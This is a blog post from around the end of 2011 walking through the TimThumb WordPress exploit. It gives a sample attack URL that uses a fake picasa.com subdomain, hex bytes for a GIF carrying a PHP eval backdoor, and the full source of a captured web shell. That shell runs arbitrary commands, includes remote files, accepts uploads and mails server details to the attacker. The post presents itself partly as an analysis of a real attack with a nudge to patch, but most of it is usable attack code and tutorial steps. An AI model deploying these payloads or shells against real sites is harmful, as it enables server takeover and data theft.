devquotes,

Was crawling on the Internet for the last day of 2011 and i saw someone trying to hack a wordpress website using the timthumb exploit.

Maybe you about it, maybe you don’t. Anyway, i’ll show you how to exploit the vuln

For of all you should find a wordpress using any theme having the timthumb.php

www.******.com/xmlrpc/xmlrpc/xmlsrv/xmlsrv/community/wp-content/themes/DailyNotes/timthumb.php?src=picasa.com.thewhisperingpinesmotel.com/logIn.php

The vuln is because, the « src » parameter only check if well know website are present in the provided URL but as you can see, if you create a fake sub domain name with picasa.com (as in the example), the str_post will return a true value and allow you to upload anything.
You’ll find many information on this wordpress vulnerability

i’ll let you check sources for the bad check implementation:

Anyway, you can now upload any gif file. I’ll give you one :

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

Here is a fake transparent gif with this PHP command : <?php @eval($_GET['cmd']) ?>

A good beginning for breaking into website :p

Let’s analyse the login.php backdoor the hacker is trying to upload on the destination website. As you see he’s located at  the URL : picasa.com.thewhisperingpinesmotel.com/logIn.php

(working URL)

Here is the source :

GIF89a
?
????ÿÿÿ???!ù
????,????
?
??D
?;?

and here the base64 « translated »

echo "";

if (isset ($_REQUEST["SakawteaM"])){
include($_REQUEST["SakawteaM"]);
exit;
}

echo '
software: '.getenv("SERVER_SOFTWARE").'
uname -a: '.php_uname().'
safe-mode: '; $safemode = @ini_get("safe_mode"); echo (($safe_mode)?("ON"):("OFF")); echo '













 


 


 
';

if (isset ($_POST['cmd'])){
$cfe = $_POST['cmd'];
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 echo $res;
}

if (isset ($_FILES['file']['tmp_name'])){
$tempname = $_FILES['file']['tmp_name'];
$name = $_FILES['file']['name'];
if(copy("$tempname", "$name")){
echo "File uploaded";
}
else {
echo "File not uploaded!";
}
}

echo '

 
';
$visitor     = getenv("REMOTE_ADDR");
$inject     =($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$info        = ($_SERVER['SERVER_SIGNATURE']);
$UName   = `uname -a`;

$msg    ="\n

http://$inject\n

$UName\n
=====================\n
IP : $visitor\n
=====================\n";

$to = '[email protected]'; #email kamu disini
$subject = 'TM shell';
$message = $msg;
$headers = $visitor;
{
mail($to, $subject, $message, $headers);
}

You now have an idea how hacker are using timthumb vuln to hijack you wordpress installation.
I’ll explain in a later article how to find theme or plugin using the timthumb.php file.

Have fun at patching your system before a guy from SakawteaM or any other lame team deface your website :)
Happy noob year.